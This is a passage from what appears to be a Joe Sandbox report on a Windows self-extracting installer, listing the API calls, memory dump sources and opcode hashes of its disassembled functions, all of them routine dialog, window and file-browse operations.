                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                                        • String ID: pA
                                                                                                                                        • API String ID: 801014965-794713698
                                                                                                                                        • Opcode ID: cae9fb80b135284d651053ec5c4070e0fe44fc22ae79128d29673caf091d45a2
                                                                                                                                        • Instruction ID: 5929b0b6314edc43fbf3f3d2a0fc95e577a76ca797df3ab901b2fe2a182a5e0d
                                                                                                                                        • Opcode Fuzzy Hash: cae9fb80b135284d651053ec5c4070e0fe44fc22ae79128d29673caf091d45a2
                                                                                                                                        • Instruction Fuzzy Hash: 1141ADB2D41344BFDB22CFA5DC55AEABBB9FB09710F20012BE841A3291D7785D81CB59
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(?), ref: 00407F94
                                                                                                                                        • GetWindowLongW.USER32(00000000), ref: 00407F9B
                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00407FB1
                                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 00407FCE
                                                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 00407FE0
                                                                                                                                        • GetSystemMetrics.USER32(00000032), ref: 00407FE7
                                                                                                                                        • GetWindowDC.USER32(?), ref: 00407FF9
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00408006
                                                                                                                                        • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 0040803A
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00408042
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2586545124-0
                                                                                                                                        • Opcode ID: 02fb6cd533524937890b9fbe5e83660d242e66e068d65fd6c1c3ae9fb8eaf448
                                                                                                                                        • Instruction ID: 8ffa6a621c4839b38abe7fa2179ce9be6ee40ef55f84cce8d9fec75f1bbbc175
                                                                                                                                        • Opcode Fuzzy Hash: 02fb6cd533524937890b9fbe5e83660d242e66e068d65fd6c1c3ae9fb8eaf448
                                                                                                                                        • Instruction Fuzzy Hash: 8D214F7650021ABFCB019FB8DD48EEF3B69FB08351F004525FA11E2291CB35D920CB65
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004091A7: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091EF
                                                                                                                                          • Part of subcall function 004091A7: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040920F
                                                                                                                                          • Part of subcall function 004091A7: GetDlgItem.USER32(?,000004B7), ref: 00409222
                                                                                                                                          • Part of subcall function 004091A7: SetWindowLongW.USER32(00000000,000000FC,Function_00007F86), ref: 00409230
                                                                                                                                          • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                                                                                          • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                                                                                          • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                                                                                                        • GetDlgItem.USER32(?,000004B6), ref: 004094A8
                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 004094AB
                                                                                                                                        • CreateWindowExA.USER32(00000200,Edit,0041A840,500100A0,?,?,?,?,?,000004B6,00000000,00000000), ref: 004094E1
                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004094F1
                                                                                                                                        • GetDlgItem.USER32(?,000004B6), ref: 004094FE
                                                                                                                                        • SendMessageW.USER32(00000000,00000030,?,00000001), ref: 00409508
                                                                                                                                        • GetDlgItem.USER32(?,000004B6), ref: 00409512
                                                                                                                                        • SetFocus.USER32(00000000), ref: 00409515
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystem
                                                                                                                                        • String ID: Edit
                                                                                                                                        • API String ID: 2563414232-554135844
                                                                                                                                        • Opcode ID: 1c951395b049d258c5149e896e0566e3ea25c6708d6124f10a7b0945db6253a7
                                                                                                                                        • Instruction ID: 4d71b540c7600c41684bbba3335aa98688d5166c257b7e93b864b054f1ea387c
                                                                                                                                        • Opcode Fuzzy Hash: 1c951395b049d258c5149e896e0566e3ea25c6708d6124f10a7b0945db6253a7
                                                                                                                                        • Instruction Fuzzy Hash: DA116A71A00204BFEB11ABE5DD49FAFBBBCEF48B00F104429B201F61A1C675AD50876D
                                                                                                                                        APIs
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403EDF
                                                                                                                                          • Part of subcall function 00402D03: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402D76
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403F05
                                                                                                                                        • wsprintfA.USER32 ref: 00403F27
                                                                                                                                        • wsprintfA.USER32 ref: 00403F54
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$wsprintf
                                                                                                                                        • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                        • API String ID: 2704270482-695273242
                                                                                                                                        • Opcode ID: 33b53d402eec6e8f3b12914186b2c5884ffcd7aa6b788d70cfced2d98aefbe1a
                                                                                                                                        • Instruction ID: 886d926ed7ba0351d4e9ba57da7cb0629939e873fb03075975f52044c447bd08
                                                                                                                                        • Opcode Fuzzy Hash: 33b53d402eec6e8f3b12914186b2c5884ffcd7aa6b788d70cfced2d98aefbe1a
                                                                                                                                        • Instruction Fuzzy Hash: 15218F71A005187BDB05EAA59C86EFE73ADAB48704F14402EF504E31D1CB7DAA068799
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000004B3), ref: 0040779F
                                                                                                                                        • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077B2
                                                                                                                                        • GetDlgItem.USER32(?,000004B4), ref: 004077BC
                                                                                                                                        • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077C4
                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004077D4
                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 004077DD
                                                                                                                                        • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004077E5
                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 004077EE
                                                                                                                                        • SetFocus.USER32(00000000,?,?,00000000,00408726,000004B3,00000000,?,000004B3), ref: 004077F1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMessageSend$Focus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3946207451-0
                                                                                                                                        • Opcode ID: 68307c55e08eac57185263add51eb06e4822709b00eeca7ae34a923681d662df
                                                                                                                                        • Instruction ID: d34367ada3e0903658dac9af1ca1aef10e4e5856eabac84c2cebdb26553fe681
                                                                                                                                        • Opcode Fuzzy Hash: 68307c55e08eac57185263add51eb06e4822709b00eeca7ae34a923681d662df
                                                                                                                                        • Instruction Fuzzy Hash: A4F04F712403087BEA216B61DD86F9BBB5EDF80B54F018425F354661F0CBF7AC209A29
                                                                                                                                        APIs
                                                                                                                                        • memcpy.MSVCRT(?,0041E470,00000160), ref: 00407E20
                                                                                                                                        • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00407E3F
                                                                                                                                        • GetDC.USER32(00000000), ref: 00407E4A
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00407E56
                                                                                                                                        • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407E65
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00407E73
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00407E9B
                                                                                                                                        • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00007643), ref: 00407ED0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2693764856-0
                                                                                                                                        • Opcode ID: 6fe21de5e6cf46c2e38258430ab068c08d1ba9f3266b2be4710a35066139e936
                                                                                                                                        • Instruction ID: 8154b001b0011d5121478cb58b91efa441906eea3886e432abe560883a3f5ac4
                                                                                                                                        • Opcode Fuzzy Hash: 6fe21de5e6cf46c2e38258430ab068c08d1ba9f3266b2be4710a35066139e936
                                                                                                                                        • Instruction Fuzzy Hash: 8421C375941318BFD7215BA1DD48EEB7B7CFF04301F0040B6FA09A2291D7744E948B6A
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(?), ref: 0040797F
                                                                                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0040799B
                                                                                                                                        • GetSystemMetrics.USER32(0000003D), ref: 004079A4
                                                                                                                                        • GetSystemMetrics.USER32(0000003E), ref: 004079AC
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 004079C9
                                                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004079E4
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00407A0A
                                                                                                                                        • ReleaseDC.USER32(?,?), ref: 00407A19
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2466489532-0
                                                                                                                                        • Opcode ID: 361b9f72db81968066b11de39633dd2aeb039f56a0627fc63b5b1369e6440dec
                                                                                                                                        • Instruction ID: 872bb3bd96abf1d963658246664a9f9dec04eac668a7313924c28ae5c7f0044f
                                                                                                                                        • Opcode Fuzzy Hash: 361b9f72db81968066b11de39633dd2aeb039f56a0627fc63b5b1369e6440dec
                                                                                                                                        • Instruction Fuzzy Hash: FF216871901209AFCB01CF69DD44A9EBFF4FF08360F10C46AE519A72A0D335AA50DF41
                                                                                                                                        APIs
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040895B
                                                                                                                                        • GetDlgItem.USER32(?,000004B8), ref: 00408979
                                                                                                                                        • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0040898B
                                                                                                                                        • wsprintfW.USER32 ref: 004089A9
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00408A41
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                                                        • String ID: %d%%
                                                                                                                                        • API String ID: 3753976982-1518462796
                                                                                                                                        • Opcode ID: 51ae72c57df79fbb6cbb7e6395a09830993c207f45adbfda5b45f62387b44217
                                                                                                                                        • Instruction ID: dc12f65f6354bcef20b20b64e73197b6a82627a21fa16bd919092f53849079ab
                                                                                                                                        • Opcode Fuzzy Hash: 51ae72c57df79fbb6cbb7e6395a09830993c207f45adbfda5b45f62387b44217
                                                                                                                                        • Instruction Fuzzy Hash: C531B371500208BFCB11AF51DD45EEA7BB9FF48304F10802EF986B62E1DB79A910CB59
                                                                                                                                        APIs
                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00408B52
                                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00408B63
                                                                                                                                        • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408B8D
                                                                                                                                        • SuspendThread.KERNEL32(00000298), ref: 00408BA6
                                                                                                                                        • ResumeThread.KERNEL32(00000298), ref: 00408BC3
                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00408BE5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogThreadTimer$KillResumeSuspend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4151135813-0
                                                                                                                                        • Opcode ID: 636331c51eeec99492c3656744559ca8cb25bf13f1d29267e4cf69c729943fa4
                                                                                                                                        • Instruction ID: 672def9565bfc40134271a6b6781851c3b106654d45cfef20a52af227c3b9f34
                                                                                                                                        • Opcode Fuzzy Hash: 636331c51eeec99492c3656744559ca8cb25bf13f1d29267e4cf69c729943fa4
                                                                                                                                        • Instruction Fuzzy Hash: 101191B4202608EFE7215F52EE85EA7777CFB44745700843EF986A66A1CF396C10DA1D
                                                                                                                                        APIs
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 004041F8
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?,00000000,00404980,?,?), ref: 00404236
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?,00000000), ref: 0040425C
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?), ref: 00404264
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@
                                                                                                                                        • String ID: %%T/$%%T\
                                                                                                                                        • API String ID: 613200358-2679640699
                                                                                                                                        • Opcode ID: 32ef79d1291380c273689fbeb54a3f068f011761e48dfc995dcc37c28d559008
                                                                                                                                        • Instruction ID: df8026740f1f86ca471eb2ea0e41fa98444a64685e80cf153ceacd7fb444c2e9
                                                                                                                                        • Opcode Fuzzy Hash: 32ef79d1291380c273689fbeb54a3f068f011761e48dfc995dcc37c28d559008
                                                                                                                                        • Instruction Fuzzy Hash: D411C97190010AAACF05FFA2D856CEDBB78AF14708F10846AB551760E2DF789B95CB48
                                                                                                                                        APIs
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 004042B3
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?,00000000,00404980,?,?), ref: 004042F1
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?,00000000), ref: 00404317
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?), ref: 0040431F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@
                                                                                                                                        • String ID: %%S/$%%S\
                                                                                                                                        • API String ID: 613200358-358529586
                                                                                                                                        • Opcode ID: 234a46bb65b67f966a8e437df7229c99e997b16022daf5c37f9ee439fb3c0353
                                                                                                                                        • Instruction ID: 4488bc9e4ce621475e7ac020b16d4e8be87a05eb600b5e71f20f3fc481b48b4f
                                                                                                                                        • Opcode Fuzzy Hash: 234a46bb65b67f966a8e437df7229c99e997b16022daf5c37f9ee439fb3c0353
                                                                                                                                        • Instruction Fuzzy Hash: 7811C975900109AACF05FFA2D856CEDBB78AF14308F10846AF561760E2DF789B99CB48
                                                                                                                                        APIs
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 0040436E
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?,00000000,00404980,?,?), ref: 004043AC
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?,00000000), ref: 004043D2
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?), ref: 004043DA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@
                                                                                                                                        • String ID: %%M/$%%M\
                                                                                                                                        • API String ID: 613200358-4143866494
                                                                                                                                        • Opcode ID: 912668388eac2bfc377ae5e16b5c219b7d863f1ca1c26d4b178e3f78348507e0
                                                                                                                                        • Instruction ID: 1e1ecd5a4810495ff1b5747c8ad1555e4ca49c286c4952b26a2a60c5b9476409
                                                                                                                                        • Opcode Fuzzy Hash: 912668388eac2bfc377ae5e16b5c219b7d863f1ca1c26d4b178e3f78348507e0
                                                                                                                                        • Instruction Fuzzy Hash: D411C971900109AACF05FFA2D856CEDBB79AF14308F10846AF551760E2DF785A9ACB58
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 00408519
                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00408532
                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0040854E
                                                                                                                                        • SHGetMalloc.SHELL32(00000000), ref: 00408578
                                                                                                                                          • Part of subcall function 004082F3: GetDlgItem.USER32(?,000004B6), ref: 00408300
                                                                                                                                          • Part of subcall function 004082F3: SetFocus.USER32(00000000,?,?,004083E7,000004B6,?), ref: 00408307
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                                                                                        • String ID: A$A
                                                                                                                                        • API String ID: 1557639607-3025247501
                                                                                                                                        • Opcode ID: 7184c409714950e4399974884f9922c096c63a12bd23a875202a47cc40967fbf
                                                                                                                                        • Instruction ID: 8e2b46382c4e0e79c38c40a6d9053323f47f27154f6d6a29afbbbbb9270b0dc0
                                                                                                                                        • Opcode Fuzzy Hash: 7184c409714950e4399974884f9922c096c63a12bd23a875202a47cc40967fbf
                                                                                                                                        • Instruction Fuzzy Hash: 41114FB1A00204ABCB10DB95DA48BDE77BCAB88701F1400AEE905E7281DB79DE04CB75
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(uxtheme,?,00409133,000004B1,00000000,?,?,?,?,?,00409240), ref: 00407DB4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407DC5
                                                                                                                                        • GetWindow.USER32(?,00000005), ref: 00407DDE
                                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00407DF4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$AddressLibraryLoadProc
                                                                                                                                        • String ID: SetWindowTheme$uxtheme
                                                                                                                                        • API String ID: 324724604-1369271589
                                                                                                                                        • Opcode ID: df7da54084a7170c4669871585b62670c16e7ba2a7afe7f20da463cc21b0505e
                                                                                                                                        • Instruction ID: 9b0de1ac587a4165001920f6b170f50534138ecb837747bbddd8b6d978bb5341
                                                                                                                                        • Opcode Fuzzy Hash: df7da54084a7170c4669871585b62670c16e7ba2a7afe7f20da463cc21b0505e
